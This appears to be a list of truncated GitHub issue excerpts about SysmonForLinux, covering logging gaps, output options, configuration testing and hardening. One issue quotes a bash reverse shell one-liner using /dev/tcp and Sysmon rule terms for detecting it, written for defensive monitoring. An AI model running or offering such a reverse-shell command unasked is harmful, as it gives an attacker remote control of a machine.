SysmonForLinux
OS: Ubuntu 20.04
Installation instruction: https://github.com/Sysinternals/SysmonForLinux/blob/main/INSTALL.md#ubuntu-1804-2004--2104
sysmon config: ```xml ```
command for making dns query: `ping www.google.com`
checking event id: `sudo cat /var/log/syslog | grep -oP "EventID>\d+`
In some "network connect" events of the sysmon log the "Image" value is not displayed. Instead the value (null) is displayed. For example, the pip was updated here: ``` Event...
#### Description I'm trying to detect the following basic `bash` reverse shell `bash -i >& /dev/tcp/10.0.0.1/4242 0>&1`. I have the following Sysmon rules enabled: ```xml /bin/bash /bin/dash /bin/sh /dev/tcp /dev/udp...
The socket option allows sysmon to create a unix domain socket over which to send events to a local listener instead of writing the logs to disk. The json option...
If an application calls accept() with the addr argument set to NULL, then the remote IP address and port will be set to 0. The networkTracker::seenAccept() function needs to recognise...
Is there a possibility to change the OUTPUT file to a custom /var/log destination? In some cases you want to use for example /var/log/sysmon instead of the standard syslog,...
Is it possible for this project to get JSON support? Windows Sysmon with XML is auto-handled by most log agents to abstract the XML parsing away. However, Linux log agents...
As a best practice, the executable should have a test/dry-run option to test the configuration (syntax and working execution). Something that can be used for example in ansible template deployment to ensure not...
As a security tool, we want to ensure we are not adding more attack surface than what is prevented/detected. From early testing, the following is working on Ubuntu 18.04, 20.04 and Centos8 with few...
I took options standard for Ubuntu 20.04 and Centos/RHEL as current ones. That should not be blocking on older releases, just some warning of unsupported options. Commented out options for...